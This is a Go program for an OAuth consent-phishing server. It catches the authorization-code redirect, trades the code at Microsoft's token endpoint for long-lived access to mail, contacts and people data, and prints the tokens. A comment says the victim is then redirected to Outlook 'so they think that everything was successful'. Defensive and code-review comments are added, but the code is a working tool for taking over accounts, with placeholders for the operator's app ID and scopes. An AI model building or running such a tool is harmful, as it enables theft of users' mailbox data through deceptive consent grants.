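// Command main is an OAuth 2.0 authorization-code callback listener. It accepts
// the redirect that carries the "code" query parameter, exchanges that code at
// the v2.0 token endpoint for the scopes configured in tokenRequestBody, prints
// the token response, and then sends the browser on to Outlook.
//
// Defender's view: a grant completed through this flow appears in the tenant as
// a user consent to the configured application ID with the scopes listed below
// (offline_access plus mail/contacts/people read). Reviewing consent grants and
// limiting user consent to verified publishers are the relevant controls.
package main

import (
	"crypto/tls"
	"fmt"
	"io/ioutil"
	"log"
	"net/http"
	"net/url"
	"strings"
	"time"
)

// requestHandler handles the OAuth redirect: it reads the "code" query
// parameter, passes it to getToken, and redirects the browser to Outlook.
//
// A request without a "code" parameter (for example an error response from the
// authorization server) is answered with 400 instead of indexing an empty
// slice, which is what the previous m["code"][0] did.
func requestHandler(w http.ResponseWriter, req *http.Request) {
	// NOTE(review): the raw query contains the authorization code, so this
	// line writes a credential to stdout.
	fmt.Println(req.URL.RawQuery)

	code := req.URL.Query().Get("code")
	if code == "" {
		http.Error(w, "missing code parameter", http.StatusBadRequest)
		return
	}
	getToken(code)

	target := "https://outlook.office365.com/"
	//redirect the user so they think that everything was successful
	http.Redirect(w, req, target, http.StatusTemporaryRedirect)
}

// tokenRequestBody builds the application/x-www-form-urlencoded body for the
// authorization_code grant. The configured values are expected to be
// percent-encoded already; code comes from the incoming request after URL
// decoding, so it is re-escaped here to keep characters such as '&' or '='
// from adding or overriding form parameters.
func tokenRequestBody(code string) string {
	clientID := "fceae27c-cac4-4bd3-947e-xxxxxxx"                                     //change to your APP-id
	scope := "offline_access%20people.read%20contacts.read.shared%20mail.read"       //change to the permissions you need/want
	redirectURI := "https%3A%2F%2Fxxx.xxx.xxx.xxx%2Fpermission"                       //change to match the Redirect URI you set in your app at apps.dev.microsoft.com
	// NOTE(review): the client secret is hard-coded in source; anyone with
	// read access to this file or the built binary can recover it.
	clientSecret := "encoded_pw_secret" //webapps now need a secret password, must be percent encoded

	return fmt.Sprintf(
		"client_secret=%s&client_id=%s&scope=%s&code=%s&redirect_uri=%s&grant_type=authorization_code",
		clientSecret, clientID, scope, url.QueryEscape(code), redirectURI,
	)
}

// getToken exchanges an authorization code at the token endpoint and prints
// the response body. Failures are logged and the function returns; it no
// longer panics inside the HTTP handler goroutine or drops errors silently.
func getToken(code string) {
	transport := http.Transport{
		// Certificate verification stays enabled (this is also the default).
		TLSClientConfig: &tls.Config{InsecureSkipVerify: false},
	}
	// The timeout bounds the whole exchange so a stalled token endpoint
	// cannot hold the handler open indefinitely.
	client := http.Client{Transport: &transport, Timeout: 30 * time.Second}

	req, err := http.NewRequest("POST", "https://login.windows.net/common/oauth2/v2.0/token", strings.NewReader(tokenRequestBody(code)))
	if err != nil {
		log.Printf("building token request: %v", err)
		return
	}
	req.Header.Add("Content-Type", "application/x-www-form-urlencoded")

	resp, err := client.Do(req)
	if err != nil {
		log.Printf("sending token request: %v", err)
		return
	}
	defer resp.Body.Close()

	body, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		log.Printf("reading token response: %v", err)
		return
	}
	if resp.StatusCode != http.StatusOK {
		log.Printf("token endpoint returned %s", resp.Status)
	}
	// NOTE(review): on success this body presumably holds the access and
	// refresh tokens, so they end up in whatever captures stdout.
	fmt.Println(string(body))
}

// main registers requestHandler for every path and serves HTTPS on :443 with
// the configured certificate and key. The listener error is now reported
// instead of being discarded, so a bad certificate path or a port that is
// already in use is visible at startup.
func main() {
	fmt.Println("starting")
	http.HandleFunc("/", requestHandler)
	if err := http.ListenAndServeTLS(":443", "/etc/letsencrypt/live/your-cert.pem", "/etc/letsencrypt/live/yourprivkey.pem", nil); err != nil {
		log.Fatal(err)
	}
}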